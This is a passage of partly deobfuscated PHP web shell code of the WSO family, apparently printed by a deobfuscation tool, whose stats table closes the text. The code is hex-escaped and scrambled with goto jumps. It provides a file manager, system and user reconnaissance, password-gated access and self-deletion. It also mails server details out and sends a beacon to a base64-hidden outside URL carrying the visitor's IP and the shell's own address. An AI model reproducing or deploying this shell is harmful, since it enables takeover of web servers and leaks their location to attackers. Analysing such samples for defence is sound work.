"\123\145\x6c\x66\x52\145\155\x6f\166\145"; $menu = ''; foreach ($m as $k => $v) { $menu .= "\x3c\164\150\40\167\151\x64\164\150\75\x22" . (int) (100 / count($m)) . "\45\42\x3e\133\x3c\141\40\x68\x72\145\146\75\x22\43\x22\x20\157\156\143\154\x69\143\x6b\x3d\x22\x67\x28\x27" . $v . "\47\54\156\165\154\154\54\47\47\54\47\47\54\x27\47\x29\x22\x3e" . $k . "\74\x2f\141\x3e\x5d\74\57\164\x68\76"; } $drives = ''; if ($GLOBALS["\x6f\163"] == "\167\x69\x6e") { foreach (range("\143", "\x7a") as $drive) { if (is_dir($drive . "\x3a\x5c")) { $drives .= "\x3c\141\x20\150\x72\x65\x66\x3d\x22\x23\42\x20\157\156\143\x6c\x69\143\x6b\x3d\42\x67\x28\47\x46\151\x6c\x65\x73\115\141\156\47\x2c\x27" . $drive . "\72\x2f\x27\51\x22\x3e\133\x20" . $drive . "\40\x5d\x3c\57\x61\76\40"; } } } echo "\x3c\x74\141\142\x6c\145\40\143\154\141\163\x73\x3d\151\x6e\146\157\40\143\x65\x6c\x6c\x70\x61\x64\144\151\x6e\147\x3d\x33\x20\143\x65\x6c\154\x73\160\141\x63\x69\x6e\147\75\60\40\x77\x69\x64\x74\x68\75\x31\x30\x30\x25\76\x3c\164\162\x3e\x3c\164\144\x20\x77\x69\x64\x74\150\x3d\x31\x3e\74\163\160\141\x6e\x3e\125\x6e\141\x6d\x65\x3a\74\x62\x72\x3e\125\x73\x65\162\x3a\x3c\x62\x72\76\120\x68\x70\72\74\x62\x72\76\x48\144\144\72\74\x62\162\x3e\103\167\144\x3a" . ($GLOBALS["\157\163"] == "\x77\151\x6e" ? "\x3c\142\x72\76\104\162\151\x76\145\163\72" : '') . "\x3c\x2f\x73\160\141\156\x3e\x3c\57\164\x64\76" . "\74\164\x64\76\x3c\156\x6f\x62\x72\x3e" . substr(@php_uname(), 0, 120) . "\40\74\57\156\157\x62\162\x3e\x3c\x62\x72\x3e" . $uid . "\x20\50\x20" . $user . "\40\x29\40\x3c\163\x70\x61\x6e\76\107\x72\x6f\165\x70\72\74\57\163\x70\x61\x6e\x3e\x20" . $gid . "\40\50\40" . $group . "\x20\x29\x3c\x62\x72\x3e" . @phpversion() . "\x20\74\x73\160\141\156\x3e\x53\141\x66\145\40\155\157\x64\145\x3a\74\x2f\x73\160\x61\x6e\76\x20" . ($GLOBALS["\163\x61\x66\145\137\x6d\157\x64\x65"] ? "\74\x66\x6f\x6e\164\x20\143\x6f\154\x6f\x72\75\162\145\x64\x3e\117\116\74\x2f\146\x6f\156\164\76" : "\x3c\x66\x6f\x6e\x74\40\143\x6f\x6c\x6f\x72\x3d\43\x30\60\x62\142\x30\x30\76\74\x62\76\117\106\x46\74\x2f\x62\76\x3c\57\146\x6f\156\x74\76") . "\x20\74\141\40\150\162\x65\x66\x3d\43\40\x6f\156\143\154\x69\143\153\x3d\42\147\50\47\120\150\160\x27\x2c\x6e\x75\x6c\x6c\54\x27\47\x2c\x27\x69\156\x66\157\x27\51\42\76\133\40\x70\150\x70\x69\156\x66\157\x20\x5d\x3c\x2f\141\76\40\x3c\163\x70\x61\156\x3e\x44\141\164\x65\x74\151\x6d\145\x3a\74\57\x73\x70\141\156\76\x20" . date("\x59\x2d\x6d\55\144\x20\110\72\x69\x3a\x73") . "\74\142\x72\x3e" . wsoViewSize($totalSpace) . "\x20\74\163\160\x61\x6e\76\106\162\145\145\x3a\74\x2f\163\160\141\x6e\x3e\x20" . wsoViewSize($freeSpace) . "\40\x28" . (int) ($freeSpace / $totalSpace * 100) . "\x25\x29\x3c\x62\162\x3e" . $cwd_links . "\x20" . wsoPermsColor($GLOBALS["\x63\x77\x64"]) . "\x20\x3c\x61\40\150\162\x65\x66\75\x23\40\x6f\x6e\x63\x6c\151\143\x6b\75\42\147\50\47\106\x69\x6c\x65\163\x4d\141\156\47\54\x27" . $GLOBALS["\x68\157\x6d\x65\137\x63\x77\x64"] . "\47\54\x27\x27\x2c\x27\47\x2c\x27\47\x29\x22\76\x5b\x20\x68\157\155\145\40\135\x3c\x2f\141\x3e\x3c\142\x72\76" . $drives . "\74\57\164\x64\x3e" . "\74\164\x64\x20\167\151\x64\164\150\x3d\61\x20\x61\x6c\151\147\x6e\75\x72\151\x67\x68\x74\x3e\x3c\156\157\x62\x72\x3e\74\163\145\154\x65\143\x74\40\x6f\156\143\x68\141\x6e\x67\145\x3d\x22\x67\x28\156\165\154\154\x2c\x6e\165\x6c\154\x2c\x6e\x75\154\x6c\54\x6e\x75\154\154\54\x6e\x75\x6c\x6c\54\x74\150\151\x73\x2e\166\x61\154\x75\x65\51\42\x3e\x3c\x6f\x70\164\147\x72\157\x75\x70\x20\x6c\x61\142\145\154\x3d\x22\120\141\147\x65\x20\x63\150\141\162\163\145\164\x22\76" . $opt_charsets . "\x3c\x2f\157\160\x74\x67\x72\157\165\160\x3e\74\57\163\145\x6c\145\143\164\x3e\74\142\x72\x3e\x3c\163\x70\x61\156\76\x53\x65\x72\x76\x65\x72\x20\111\x50\x3a\74\x2f\163\x70\141\156\x3e\74\x62\x72\x3e" . @$_SERVER["\x53\x45\122\x56\x45\122\x5f\x41\x44\x44\x52"] . "\74\x62\x72\x3e\74\163\160\x61\x6e\76\103\154\151\145\156\164\x20\x49\x50\x3a\74\57\x73\x70\141\156\76\x3c\142\162\76" . $_SERVER["\122\105\115\117\x54\x45\x5f\x41\104\x44\x52"] . "\x3c\x2f\x6e\x6f\142\x72\x3e\x3c\x2f\x74\144\x3e\74\57\164\x72\76\x3c\57\164\x61\142\x6c\x65\x3e" . "\x3c\164\x61\142\154\145\x20\163\164\x79\x6c\x65\x3d\42\142\x6f\162\144\x65\162\55\164\x6f\160\x3a\x32\160\x78\40\163\x6f\x6c\151\144\x20\x23\63\x33\63\x3b\42\x20\143\x65\154\154\160\141\144\144\x69\x6e\147\75\63\x20\143\x65\154\154\x73\x70\x61\143\151\156\147\75\x30\x20\167\x69\x64\x74\150\75\x31\x30\60\x25\76\x3c\164\162\x3e" . $menu . "\74\x2f\164\162\76\x3c\57\164\141\142\154\x65\x3e\x3c\x64\x69\x76\40\x73\164\171\x6c\145\75\42\x6d\141\x72\147\151\x6e\72\65\42\x3e"; } goto u3Alk; Yc43E: $ip_remote = $_SERVER["\x52\x45\115\x4f\124\x45\x5f\101\x44\104\x52"]; goto f1qLZ; IRlis: function actionSelfRemove() { if ($_POST["\160\x31"] == "\171\x65\x73") { if (@unlink(preg_replace("\41\x5c\50\x5c\144\x2b\134\x29\x5c\x73\x2e\52\41", '', __FILE__))) { die("\x53\x68\145\x6c\x6c\40\x68\x61\x73\x20\142\x65\145\156\x20\162\145\x6d\157\166\145\144"); } else { echo "\165\156\x6c\151\156\153\x20\x65\162\x72\157\162\x21"; } } if ($_POST["\x70\x31"] != "\171\x65\163") { wsoHeader(); } echo "\74\150\61\76\123\165\x69\x63\151\144\x65\74\x2f\150\x31\76\74\x64\151\x76\40\x63\x6c\x61\x73\163\75\x63\x6f\156\x74\x65\x6e\164\76\x52\145\x61\x6c\154\x79\40\167\141\156\x74\x20\x74\x6f\40\162\x65\x6d\x6f\x76\x65\40\x74\150\145\40\x73\150\x65\x6c\154\77\74\x62\162\76\74\141\x20\x68\x72\145\x66\75\x23\x20\157\156\x63\x6c\x69\143\153\x3d\x22\147\50\156\x75\x6c\154\x2c\x6e\x75\154\154\54\x27\171\x65\x73\x27\x29\x22\76\x59\145\x73\x3c\57\141\x3e\74\x2f\144\x69\x76\76"; wsoFooter(); } goto cwENR; VYjv_: @mail($to_email, $server_mail, $linkcr, $header); goto omlKQ; f1qLZ: $from_shellcode = "\63\x54\165\x72\162\x73\150\145\x6c\154\100" . gethostbyname($_SERVER["\123\x45\122\126\105\x52\137\116\x41\115\105"]) . ''; goto GEQIH; Xi_s3: $cwd = @getcwd(); goto POwAE; HrH07: @set_magic_quotes_runtime(0); goto dVexO; ktSrM: if (!isset($_SESSION[md5($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\123\x54"])])) { if (empty($auth_pass) || isset($_POST["\x70\x61\x73\x73"]) && md5($_POST["\160\x61\163\163"]) == $auth_pass) { $_SESSION[md5($_SERVER["\x48\124\x54\120\137\110\x4f\x53\x54"])] = true; } else { wsoLogin(); } } goto VCV6q; hFBmU: if (empty($_POST["\141"])) { if (isset($default_action) && function_exists("\141\143\x74\151\x6f\156" . $default_action)) { $_POST["\141"] = $default_action; } else { $_POST["\x61"] = "\123\145\x63\x49\156\146\157"; } } goto GAfOD; P0hHT: function actionLogout() { session_destroy(); die("\142\x79\145\x21"); } goto IRlis; Ejazf: function actionphptools() { wsoHeader(); function GetIP() { if (getenv("\110\124\x54\x50\x5f\103\x4c\111\105\x4e\x54\137\x49\120")) { $ip = getenv("\x48\124\124\120\x5f\103\114\111\105\x4e\x54\137\x49\x50"); } elseif (getenv("\110\124\x54\x50\137\x58\x5f\106\x4f\x52\127\101\122\x44\105\x44\137\x46\x4f\122")) { $ip = getenv("\110\x54\124\x50\x5f\130\137\106\117\122\127\x41\x52\104\105\104\137\106\x4f\x52"); if (strstr($ip, "\54")) { $tmp = explode("\54", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("\x52\x45\115\x4f\x54\x45\137\x41\x44\x44\122"); } return $ip; } $x = base64_decode("\x61\110\122\60\x63\x48\x4d\x36\114\171\71\150\142\155\71\x75\145\127\60\167\x64\130\115\x75\x59\62\x78\61\131\x69\71\x73\x4c\x51\75\75") . GetIP() . "\x2d" . base64_encode("\x68\164\x74\160\x3a\57\x2f" . $_SERVER["\110\x54\124\120\137\x48\x4f\x53\x54"] . $_SERVER["\122\x45\121\x55\105\123\124\137\125\x52\x49"]); if (function_exists("\143\165\162\154\137\151\156\151\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\x66\151\154\x65\x5f\x67\145\x74\137\x63\157\x6e\164\x65\x6e\x74\x73")) { @($gitt = file_get_contents($x)); };
?>Function Calls
| None |
Stats
| MD5 | c8cefe1c08019c992e992cbb92c61393 |
| Eval Count | 0 |
| Decode Time | 147 ms |